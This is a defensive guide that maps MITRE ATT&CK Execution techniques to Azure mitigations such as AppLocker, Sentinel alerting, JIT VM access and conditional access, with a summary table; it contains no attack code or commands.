Defensive Strategies: TA0002

Defensive Strategies for TA0002 - Execution

The Execution phase involves attackers running malicious code within a compromised environment to carry out their objectives, such as privilege escalation, lateral movement, or exfiltration. In Azure, attackers may abuse scripting tools, automation accounts, APIs, and remote commands to execute malicious actions. Below are key defensive strategies for TA0002 mapped to relevant techniques.

1. Limit Scripting and Shell Access

Mitigates: T1059 - Command and Scripting Interpreter (PowerShell, Unix Shell, Python)

• Action: Restrict the use of PowerShell, Bash, and other scripting tools to reduce the attack surface.

• Azure Solution:

  • Disable PowerShell remoting unless explicitly required.

  • Use AppLocker or Windows Defender Application Control to block unauthorized scripts.

  • Monitor PowerShell and shell activities with Azure Sentinel and Defender for Cloud.

2. Monitor and Secure Automation Accounts

Mitigates: T1569.002 - Service Execution, T1574.007 - Service Hijacking

• Action: Ensure that Automation Runbooks and tasks are not modified to run malicious scripts.

• Azure Solution:

  • Use Azure Monitor to track changes to automation accounts and runbooks.

  • Set alerts in Azure Sentinel for any unauthorized execution of automation tasks.

  • Apply least privilege principles to automation accounts to limit the impact of abuse.

3. Control Remote Command Execution

Mitigates: T1569 - System Services, T1546 - Event Triggered Execution

• Action: Monitor and restrict remote command execution on VMs using VM RunCommand.

• Azure Solution:

  • Disable VM RunCommand if not required, or restrict access using RBAC.

  • Enable Azure Defender for VMs to detect suspicious script executions on virtual machines.

  • Use just-in-time (JIT) VM access to limit remote command execution windows.

4. Monitor API Calls for Execution Activities

Mitigates: T1106 - Native API

• Action: Track API calls that can create resources or trigger automation.

• Azure Solution:

  • Enable Azure Monitor and Azure Sentinel to track suspicious API calls, such as role assignments or VM creation.

  • Use activity logs to detect unusual API activity patterns and respond to incidents.

5. Detect Malicious User-Initiated Actions

Mitigates: T1204 - User Execution (Malicious Link, Malicious File)

• Action: Monitor for social engineering attacks targeting users with malicious links or files.

• Azure Solution:

  • Use Microsoft Defender for Office 365 to block phishing attempts and malicious attachments.

  • Configure Azure AD Conditional Access Policies to limit risky user behavior.

  • Enable audit logging to detect malicious file executions and access attempts.

6. Disable or Restrict Sudo Access on Linux VMs

Mitigates: T1548 - Abuse Elevation Control Mechanism

• Action: Limit sudo privileges on Linux VMs to prevent abuse.

• Azure Solution:

  • Enforce key-based authentication and disable password-based logins.

  • Use Azure Defender to monitor for unauthorized privilege escalation attempts.

7. Use Conditional Access Policies to Limit Execution Risk

Mitigates: T1078 - Valid Accounts

• Action: Use Conditional Access Policies to restrict account usage based on context (e.g., IP, device compliance).

• Azure Solution:

  • Block risky sign-ins and apply MFA requirements for privileged users.

  • Use Azure Identity Protection to detect suspicious logins and mitigate compromised accounts.

8. Implement Application Whitelisting and Endpoint Protection

Mitigates: T1218 - Signed Binary Proxy Execution

• Action: Restrict the execution of legitimate but potentially abused binaries, such as MSBuild.

• Azure Solution:

  • Use Microsoft Defender for Endpoint to monitor and block the execution of unauthorized processes.

  • Implement AppLocker policies to restrict the use of binaries like MSBuild.exe.

9. Harden VMs Against Reverse Shells and Backdoors

Mitigates: T1059.004 - Unix Shell

• Action: Monitor Linux VMs for reverse shells or malicious cron jobs.

• Azure Solution:

  • Use Azure Defender for Linux VMs to detect and block threats including web shells.

  • Set up alerts for modifications to cron jobs and .bashrc files.

10. Respond to Execution Attempts Automatically

Mitigates: T1569 - System Services, T1106 - Native API

• Action: Automate responses to suspicious execution activities.

• Azure Solution:

  • Use Azure Sentinel playbooks to disable accounts or stop VMs upon detecting suspicious activity.

  • Integrate Microsoft Defender for Cloud with Sentinel to respond to execution alerts in real-time.

Summary of Defensive Measures for TA0002

Defensive Strategy	Mitigates	Azure Solution
Limit Scripting and Shell Access	T1059 - Command and Scripting Interpreter	Block unauthorized scripts with AppLocker and monitoring
Secure Automation Tools	T1569.002 - Service Execution	Monitor runbooks with Azure Monitor and Sentinel
Control Remote Execution	T1569 - System Services	Use JIT VM access and restrict RunCommand usage
Monitor API Calls	T1106 - Native API	Use Azure Sentinel to detect suspicious API activity
Detect User-Initiated Execution	T1204 - User Execution	Use Defender for O365 to block malicious links and files
Restrict Sudo and Privileges	T1548 - Abuse Elevation Control Mechanism	Monitor sudo usage with Azure Defender
Apply Conditional Access Policies	T1078 - Valid Accounts	Enforce MFA and apply risk-based conditional access policies
Implement App Whitelisting	T1218 - Signed Binary Proxy Execution	Use AppLocker to block unauthorized binaries
Harden VMs Against Reverse Shells	T1059.004 - Unix Shell	Monitor for cron jobs and reverse shells with Defender
Automate Response to Execution Events	T1569 - System Services	Use Sentinel playbooks for automated response